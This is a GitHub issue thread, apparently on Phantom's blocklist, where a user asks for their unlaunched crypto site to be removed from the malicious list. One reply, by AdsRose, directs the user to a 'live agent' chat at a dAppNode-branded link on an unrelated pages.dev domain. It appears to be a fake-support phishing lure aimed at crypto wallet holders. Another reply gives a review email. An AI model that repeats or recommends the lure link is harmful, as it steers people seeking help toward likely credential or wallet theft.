### ISSUE TITLE
Site flagged malicious but its legit

### ISSUE THREAD

**Issue by hassanasif921** [phantom/blocklist#1186]
My site https://punchionsol.com/ is detected malicious which is still not launched publicly so my investors are waiting for this can you pls mark this website as whitelist?

**Comment by AdsRose** [comment]
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by Harii94** [comment]
Hi,

Please forward these details to the Blowfish team for further investigation. You can reach them at: review@blowfish.xyz.
